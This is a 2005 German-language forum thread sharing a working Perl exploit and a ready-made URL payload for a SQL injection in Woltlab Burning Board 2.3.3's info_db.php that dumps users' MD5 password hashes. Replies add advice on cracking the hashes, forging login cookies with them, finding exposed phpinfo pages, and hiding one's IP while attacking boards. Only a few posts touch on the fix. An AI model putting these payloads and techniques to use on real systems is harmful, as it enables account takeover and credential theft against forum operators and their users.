Woltlab Burning Board <= 2.3.3 info_db.php SQL injection Exploit

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von WAN, 17. Dezember 2005 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 17. Dezember 2005
    Weiß nicht obs schonmal da war...





    #!/usr/bin/perl -w

    ## Woltlab Burning Board <= 2.3.3 info_db.php SQL injection
    ##
    ## This perl script will fetch the MD5 hash from any wbb that is running with info_db.php
    ##
    ##
    ##
    ##
    ##
    ##
    ## written by [R]
    ## greetz fly out to the whole rootbox/batznet crew!
    ##



    use LWP::Simple;
    use strict;
    use warnings;


    my $target = $ARGV[0];
    my $userid = $ARGV[1];
    my $exploit = "/info_db.php?action=file&fileid=- 1%20UNION%20SELECT%20password,password,password,password,password,password,
    password,password,password,password,password,password,password,password,pas
    sword,password,password,password%20FROM%20bb1_users%20WHERE%20userid=$useri
    d/*";

    # different way of exploiting, see adv..
    # my $exploit = "/info_db.php?action=file&fileid=59& subkatid=10'%20UNION%20SELECT%20password,password,password,password,passwor
    d,password,password,password,password,password,password,password,password,p
    assword,password,password,password,password,password,password,password,pass
    word,password,password%20FROM%20bb1_users%20WHERE%20userid=$userid/*";

    if ($target eq "" && $userid eq "") {
    print "\nWoltlab Burning Board <= 2.3.3 info_db.php SQL injection\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
    print "\nUsage:\n";
    print "perl $0 [TARGET] [USERID]\n";
    print "perl $0 fbi.gov/path/ 1\n\n";
    exit();
    }


    print ("\n[+] Trying to exploit the target...");
    sleep(10);
    print ("\n[+] Ok - should be exploited!\n");
    sleep(5);


    my $hash = get "http://www.$target/$exploit";


    $hash =~ s/<.*?>//sg; # clean the whole html code
    $hash =~ s!\ !!g; # clean
    $hash =~ s/©//g; # clean ©

    print ("\n[+] Successfully exploited!\n");
    print ("\n");

    print ("[+] MD5 Hash: ");
    print $hash =~ m/\b(\w{32})\b/; # get the hash
    print ("\n\n");


    exit();

    # batznet-security.de && batznet.com
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 17. Dezember 2005
    Also ick hab damit nen Prob das der nicht funzt konnte die fehlermeldungen

    zwar schon auf 3 reduzieren aber ich kenne mich auch zuwenig mit perl aus :(
     
  4. #3 17. Dezember 2005
    Einfach mit nem Browser auf's Board.
    Dann hat man die URL z.b. http://www.google.de/forum/index.php
    => anstatt der /index.php folgendes hin:
    Code:
    /info_db.php?action=file&fileid=-1%20UNION%20SELECT%20password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password%20FROM%20bb1_users%20WHERE%20userid=1/*
    
    Wobei der 1er am Ende die jeweilige UserID ist.
    Und schon sieht man den md5-Hash.
    [vorausgesetzt dass info_db.php existiert]

    //edit: zu den Fehlern.. hast du das Perl modul LWP/Simple.pm installiert?
     
  5. #4 17. Dezember 2005
    ach ja für die ganz schlauen,funzt aufm RR Board nicht,braucht ihr gar nit erst versuchen ;)
     
  6. #5 17. Dezember 2005
    Ändern ..

    Hallo,

    wie kann man den BUG schliessen damit man nicht an die md5 hasesh rankommt .. ??

    Lösungsvorschlag von euch ??

    mfg
     
  7. #6 17. Dezember 2005
    RE: Ändern ..

    info_db.php entfernen^^
     
  8. #7 19. Dezember 2005
    nur :poop:, dass sogut wie kein board die info_db mehr drin hat...
     
  9. #8 20. Dezember 2005
    genug ..

    Hallo,

    kenn genug die dasnoch aktiv drinnen haben - nur was bringts ist das md5 passwort mit dem man nichts anfangt .. is ja md5 somit unknackbar bzw. fürn normalen hausgebauch unbrauchbar ..

    mfg freakZ
     
  10. #9 20. Dezember 2005
    Falsch.. Stichwort mdcrack / reinbowtable usw.. wurde schon oft besprochen.
     
  11. #10 20. Dezember 2005
    oh doch md5 is sehr gut knackbar, was sollte sonst der sinn des exploits sein?? cain und abel ist ein gutes tool für md5cracking
     
  12. #11 20. Dezember 2005
    Und außerdem um in ein Forum einzudringen muss man garnicht den Hash knacken sondern lediglich in den Cookie einbauen..
     
  13. #12 20. Dezember 2005
    ip hidden .. ??

    Hallo,

    hab enige board gefunden problem ist nur die logen ja die real ip auch wnen man proxy drinnen hat wie umgeh ich das ganze ??

    Ideen .. ??

    mfg
     
  14. #13 21. Dezember 2005
    RE: ip hidden .. ??

    omg lass es lieber bleiben wie man merkt hast du kein peil davon und das ist nicht gut für dich wenn du irgendne :poop: machst
     
  15. #14 21. Dezember 2005
    RE: ip hidden .. ??

    remote versuchen. aber lass es lieber gleich...
     
  16. #15 21. Dezember 2005
    Ich will nicht zuviel verraten, aber den hash bekommt man nicht nur bei der info_db.php sondern unter anderem auch in den datein:

    phpinfo.php
    infophp.php

    Diese liegen mit Glück im root Verzeichnis des Servers.

    Pro Hoster sind die Datein oft unterschiedlich benannt, verwenden die phpinfo() Funktion.

    Wer also eine solche Datei liegen hat, am Besten löschen denn unter:

    Apache Environment und HTTP Headers Information wird der Hash wunderschön angezeigt!

    :)
     
  17. #16 22. Dezember 2005
    PROBLEM.

    also ich kenne jemanden der ein forum hat wo die datei info_db.php noch da ist.

    nur das prob ist die datei info_db.php wird für das portal benötigt um die uploads der user anzuzeigen


    hat jemand eine lösung für das problem ?
    vll umcoden oder ?
     
  18. #17 23. Dezember 2005
    da müsste ne funktion phpinfo() drin sein, versuch diese mal daraus zu löschen, oder schau dir den explot genau an, welche funktion dieser nutzt
     
  19. #18 24. Dezember 2005
    cookie ..

    Hallo,

    bekomm durch einen anderne fehler den session cookie raus was kann ich damit tun .. ????

    mfg
     
  20. #19 24. Dezember 2005
    RE: cookie ..

    cookie fälschen,ich sag mal soviel,leg dir nen account in diesem board an,logge dich damit ein,such dann nach den cookie.txt 'S und veränder in dieser datei den user namen und den pw hash auf den herausgefunden wert!
     
  21. #20 11. Januar 2006
    Hallo
    Leute es gibt seit ein paar Tagen eine neue Wbb Version

    ich habe nme orginale linzem und kann alles aus dem Download Bereich ziehen.

    habe hier mal für Euch das Org. komplett Packet des neuen wbb2.3.4

    Hier gehts zum Download
    E:\by phraser:habs mal rausgemacht,da hier nicht die Appz Section!
     
  22. #21 11. Januar 2006
    Danke,aber das ist hier nicht die Appz section!
     

  23. Videos zum Thema
Die Seite wird geladen...